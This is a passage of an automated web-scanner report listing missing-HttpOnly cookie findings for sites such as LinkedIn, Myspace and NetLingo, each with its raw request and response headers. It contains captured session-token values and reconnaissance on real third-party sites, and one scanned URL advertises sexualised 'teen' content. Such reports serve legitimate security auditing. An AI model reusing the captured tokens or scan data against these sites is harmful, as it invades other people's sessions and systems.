Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: test_element_id=0; expires=Mon, 25-Apr-2011 00:02:36 GMT; path=/
X-Server-Id: W2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52497

   
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head dir="ltr" lang="en-us" profile="http://purl.org/uF/2008/03/ http://purl.org/uF/hCard/1.0/ http://gmpg.org/xfn/11">
   <meta http-equi
...[SNIP]...

14.134. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...

14.135. http://www.homes.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.homes.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
  • CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
  • IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
  • IS_MOBILE=false;path=/
  • CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
  • TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:20 GMT
Set-Cookie: CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
Content-Length: 32451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Homes.com - Ho
...[SNIP]...

14.136. http://www.hotelcoupons.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotelcoupons.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDSSSQSDQC=DNBEMMLCBPOAIFFKBFHHMBOM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hotelcoupons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21491
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSSQSDQC=DNBEMMLCBPOAIFFKBFHHMBOM; path=/
X-Powered-By: ASP.NET
ServerId: 1
Server: Norfolk
Date: Tue, 25 Jan 2011 00:03:27 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

14.137. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.iloubnan.info
Path:   /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=f7486e8717b0e20364b742ecc154ea9e; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 HTTP/1.1
Host: www.iloubnan.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f7486e8717b0e20364b742ecc154ea9e; path=/
Connection: close
Content-Type: text/html
Content-Length: 46875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"

xmlns:og="http://opengraph
...[SNIP]...

14.138. https://www.isc.org/software/inn

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.isc.org
Path:   /software/inn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:03:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8k DAV/2 PHP/5.2.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.12
Set-Cookie: SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:03:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

14.139. http://www.linkedin.com/company/805465

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /company/805465

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID="ajax:4114291373918205941"; Version=1; Path=/
  • leo_auth_token="GST:UoW4AS-tuKNn5DcHUPtJAkw5UTo1RwdYXEpCAnyOqUgnfH_r88e9Gn:1295930580:095f9f787f0c0472ca72a7237529789a55194807"; Version=1; Max-Age=1799; Expires=Tue, 25-Jan-2011 05:12:59 GMT; Path=/
  • s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
  • bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
  • lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/805465 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:4114291373918205941"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UoW4AS-tuKNn5DcHUPtJAkw5UTo1RwdYXEpCAnyOqUgnfH_r88e9Gn:1295930580:095f9f787f0c0472ca72a7237529789a55194807"; Version=1; Max-Age=1799; Expires=Tue, 25-Jan-2011 05:12:59 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/companies/kirshenbaum-bond-senecal-%2B-partners
Content-Language: en-US
Content-Length: 0
Date: Tue, 25 Jan 2011 04:43:00 GMT


14.140. http://www.liutilities.com/affcb/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.liutilities.com
Path:   /affcb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQCAQDBDA=NJMAJEECHGPFEFOADGEGCEPG; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affcb/ HTTP/1.1
Host: www.liutilities.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://store.uniblue.com/278/purl-?affiliate=&x-at=
Content-Length: 176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCAQDBDA=NJMAJEECHGPFEFOADGEGCEPG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://store.uniblue.com/278/purl-?affiliate=&amp;x-at=">here</a>.</body>

14.141. http://www.mathias-bank.de/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=3497fb0606bae927d83d82e254f5c56a; path=/
  • bb2_screener_=1295930659+173.193.214.243; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1295930659+173.193.214.243; path=/
Set-Cookie: PHPSESSID=3497fb0606bae927d83d82e254f5c56a; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

14.142. http://www.metacafe.com/fplayer/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
  • OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
  • OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
  • User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
  • dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

14.143. http://www.mister-wong.com/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • wongsess=847df68c6b6a1522859025303610eb1c; expires=Fri, 25 Jan 2036 10:46:31 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:30 GMT
Server: Apache
Set-Cookie: wongsess=847df68c6b6a1522859025303610eb1c; expires=Fri, 25 Jan 2036 10:46:31 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7516
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...

14.144. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myproductadvisor.com
Path:   /mpa/autobytel/setCookie.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=a7ff3102cc2a90029701232ccef5; Path=/mpa
  • Coyote-2-c0a8010b=c0a801cd:0; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mpa/autobytel/setCookie.do HTTP/1.1
Host: www.myproductadvisor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 00:08:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UIVERSION_COOKIE=1; Path=/mpa/
Set-Cookie: JSESSIONID=a7ff3102cc2a90029701232ccef5; Path=/mpa
Location: http://www.myproductadvisor.com/mpa/cookiecheck.do?originalurl=aHR0cDovL3d3dy5teXByb2R1Y3RhZHZpc29yLmNvbS9tcGEvYXV0b2J5dGVsL3NldENvb2tpZS5kbw==
Content-Length: 0
P3P: policyref="/content/w3c/p3p.xml", CP="NOI DSP NID CURa ADMa DEVa TAIa PSAa PSDa OUR NOR IND COM NAV STA"
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-c0a8010b=c0a801cd:0; path=/


14.145. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
  • MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: e33e7134e948ea36efc91ee918fd1313dbac0906ff7c9eb7
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/
Set-Cookie: SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Keebler Elves
Date: Tue, 25 Jan 2011 04:46:54 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

14.146. http://www.myspace.com/netlingo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
  • MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Server: 53fa252345a87b39ff47aafb4ed7b2849b482ff947909977
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
Set-Cookie: SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Tue, 25 Jan 2011 04:46:51 GMT
Content-Length: 29349
X-Vertical: profileidentities


<!DOCTYPE html>
<html class="noJS en-US">
   <!-- UserViewProfile -->
<head><meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>
   NetLingo on Myspace
</title>
       <script type="text/ja
...[SNIP]...

14.147. http://www.net-folio.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.net-folio.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=dd1e473e424e2ab82663e797b0d63d68; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.net-folio.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:47:23 GMT
Server: Apache
Set-Cookie: PHPSESSID=dd1e473e424e2ab82663e797b0d63d68; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /website-for-photographers/index.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


14.148. http://www.netlingo.com/log-out.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /log-out.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=ehd1dtnn6gfpn9q5gde0agedi1; path=/
  • username=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
  • email=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
  • password=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
  • userid=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
  • paiduserYN=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /log-out.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:52:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ehd1dtnn6gfpn9q5gde0agedi1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: username=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: email=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: password=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: userid=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
Set-Cookie: paiduserYN=deleted; expires=Mon, 25-Jan-2010 04:52:49 GMT
location: login.php?frm_error=2
Content-Length: 0
Connection: close
Content-Type: text/html


14.149. http://www.netlingo.com/login.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /login.php

Issue detail

